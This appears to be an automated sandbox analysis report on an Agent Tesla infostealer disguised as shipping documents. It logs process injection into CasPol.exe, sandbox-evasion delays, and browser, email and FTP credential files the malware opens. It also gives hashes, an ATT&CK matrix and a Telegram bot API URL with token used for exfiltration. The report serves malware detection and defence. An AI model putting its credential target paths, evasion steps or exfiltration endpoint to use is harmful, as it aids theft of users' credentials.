              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe TID: 4708Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3724Thread sleep time: -26747778906878833s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4816Thread sleep count: 9841 > 30
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\?????.sysJump to dropped file
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9841
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
              Source: CasPol.exe, 00000001.00000002.829128989.0000000006340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06232530 LdrInitializeThunk,
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 438000
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 43A000
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D1F008
              Source: BL-SHIPPING DOCUMENTS.exe, kmLQrC0PWk0U/qFi2Tt7TNT.csReference to suspicious API methods: ('4y8gu7rkkr', 'LoadLibraryW@kernel32')
              Source: 1.0.CasPol.exe.400000.0.unpack, A/C1.csReference to suspicious API methods: ('A', 'VirtualAllocExNuma@kernel32.dll')
              Source: 1.0.CasPol.exe.400000.0.unpack, A/e2.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeQueries volume information: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR
              Source: Yara matchFile source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: Yara matchFile source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR
              Source: Yara matchFile source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts211
              Windows Management Instrumentation
              2
              LSASS Driver
              2
              LSASS Driver
              1
              Disable or Modify Tools
              2
              OS Credential Dumping
              114
              System Information Discovery
              Remote Services11
              Archive Collected Data
              Exfiltration Over Other Network Medium1
              Web Service
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Native API
              2
              Windows Service
              2
              Windows Service
              1
              Deobfuscate/Decode Files or Information
              1
              Credentials in Registry
              111
              Security Software Discovery
              Remote Desktop Protocol2
              Data from Local System
              Exfiltration Over Bluetooth11
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)211
              Process Injection
              2
              Obfuscated Files or Information
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin Shares1
              Email Collection
              Automated Exfiltration2
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
              Software Packing
              NTDS131
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput CaptureScheduled Transfer3
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets1
              Application Window Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common131
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Remote System Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items211
              Process Injection
              DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              BL-SHIPPING DOCUMENTS.exe22%ReversingLabsWin64.Trojan.AgentTesla
              BL-SHIPPING DOCUMENTS.exe27%VirustotalBrowse
              BL-SHIPPING DOCUMENTS.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\?????.sys1%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\?????.sys0%ReversingLabs
              SourceDetectionScannerLabelLinkDownload
              1.0.CasPol.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://api.telegram.org40%URL Reputationsafe
              https://www.sysinternals.com00%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
              http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              https://FZsMKmQQms.net0%Avira URL Cloudsafe
              http://TcwLAp.com0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              api.telegram.org
              149.154.167.220
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocumentfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://TcwLAp.comCasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://127.0.0.1:HTTP/1.1CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/1504449137%discordapi%yyyCasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://api.telegram.org4CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.telegram.orgCasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://www.sysinternals.com0?????.sys.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://api.telegram.orgCasPol.exe, 00000001.00000002.824168793.00000000034D8000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://FZsMKmQQms.netCasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.824168793.00000000034D8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.823692783.0000000003476000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            149.154.167.220
                            api.telegram.orgUnited Kingdom
                            62041TELEGRAMRUfalse
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:756203
                            Start date and time:2022-11-29 19:59:06 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 8m 21s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:BL-SHIPPING DOCUMENTS.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:5
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/2@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240s for sample files taking high CPU consumption
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            20:01:10API Interceptor1280x Sleep call for process: CasPol.exe modified
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):654
                            Entropy (8bit):5.374391981354885
                            Encrypted:false
                            SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhap+92n4MNQpN9tv:ML9E4KrgKDE4KGKN08AKh6+84xpNT
                            MD5:C8A62E39DE7A3F805D39384E8BABB1E0
                            SHA1:B32B1257401F17A2D1D5D3CC1D8C1E072E3FEE31
                            SHA-256:A7BC127854C5327ABD50C86000BF10586B556A5E085BB23523B07A15DD4C5383
                            SHA-512:7DB2825131F5CDA6AF33A179D9F7CD0A206FF34AE50D6E66DE9E99BE2CD1CB985B88C00F0EDE72BBC4467E7E42B5DC6132403AA2EC1A0A7A6D11766C438B10C3
                            Malicious:true
                            Reputation:moderate, very likely benign file
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..
                            Process:C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe
                            File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):36208
                            Entropy (8bit):6.284053631838433
                            Encrypted:false
                            SSDEEP:768:tKCM0IWRhm8LiES4cT4iZ923OMqUD6Q4KICJw4:t7/Vhzb3pL4GJw4
                            MD5:97E3A44EC4AE58C8CC38EEFC613E950E
                            SHA1:BC47E15537FA7C32DFEFD23168D7E1741F8477ED
                            SHA-256:440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C
                            SHA-512:8EF7FC489B6FFED9EC14746E526AE87F44C39D5EAFFF0D4C3BFA0B3F0D28450F76D1066F446C766F4C9A20842A7F084FE4A9F94659D5487EA88959FCCB2A96EB
                            Malicious:true
                            Antivirus:
                            • Antivirus: Virustotal, Detection: 1%, Browse
                            • Antivirus: ReversingLabs, Detection: 0%
                            Reputation:moderate, very likely benign file
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3...w.{.w.{.w.{.~...p.{.w.z.H.{.~...t.{.~...t.{.~...t.{."...v.{."..v.{.".y.v.{.Richw.{.........PE..d...l..a.........." .....L..........X.......................................................................................................x...(............`.......l..p!......0....I..T............................................@...............................text....%.......&.................. ..h.rdata.......@.......*..............@..H.data...,....P.......:..............@....pdata.......`.......<..............@..HPAGE.........p.......@.............. ..`INIT.................\.............. ..b.rsrc................f..............@..B.reloc..0............j..............@..B................................................................................................................................................................................................
                            File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):7.995705127935573
                            TrID:
                            • Win64 Executable GUI (202006/5) 92.65%
                            • Win64 Executable (generic) (12005/4) 5.51%
                            • Generic Win/DOS Executable (2004/3) 0.92%
                            • DOS Executable Generic (2002/1) 0.92%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:BL-SHIPPING DOCUMENTS.exe
                            File size:489472
                            MD5:69fe54a9cafee09f25e0d3f7a51488c7
                            SHA1:747373a2640c7fca04258681c7ec313be3b0db24
                            SHA256:dc72c7525da8aa1afaadaf707499054dd9be20d0c78318d2f63af1fa37d58546
                            SHA512:4230111e1b90da8e5d628bcfd16f9381cb24e9c0e31d3772798ea5bf78c711bc2634bf0343f323d094f23f587b6be5fd41f7828323d09f8a3ce0506c65a50706
                            SSDEEP:12288:0ZYJmqS//u3ML7l++F7oNt6YkIwaD2YSHTK:0Sg43ML7cEs8VaYTK
                            TLSH:32A423115AAE8580D1E98731D0A2663C41F5D323D8CBFB9973C8A36DB441A3FC7D52A9
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...&$.c.........."...0..o............... ....@...... ....................................`................................
                            Icon Hash:00828e8e8686b000
                            Entrypoint:0x400000
                            Entrypoint Section:
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x63852426 [Mon Nov 28 21:12:06 2022 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:
                            Instruction
                            dec ebp
                            pop edx
                            nop
                            add byte ptr [ebx], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax], al
                            add byte ptr [eax], al
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x7a0000x4c6.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x78f780x1c.text
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000x76fe70x77000False0.9969061843487395data7.998151218559443IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc0x7a0000x4c60x600False0.373046875data3.6932619079957036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountry
                            RT_VERSION0x7a0a00x23cdata
                            RT_MANIFEST0x7a2dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            192.168.2.5149.154.167.220497054432851779 11/29/22-20:01:10.306536TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49705443192.168.2.5149.154.167.220
                            TimestampSource PortDest PortSource IPDest IP
                            Nov 29, 2022 20:01:09.829746008 CET49705443192.168.2.5149.154.167.220
                            Nov 29, 2022 20:01:09.829794884 CET44349705149.154.167.220192.168.2.5
                            Nov 29, 2022 20:01:09.829884052 CET49705443192.168.2.5149.154.167.220
                            Nov 29, 2022 20:01:09.872064114 CET49705443192.168.2.5149.154.167.220
                            Nov 29, 2022 20:01:09.872085094 CET44349705149.154.167.220192.168.2.5
                            Nov 29, 2022 20:01:09.951184034 CET44349705149.154.167.220192.168.2.5
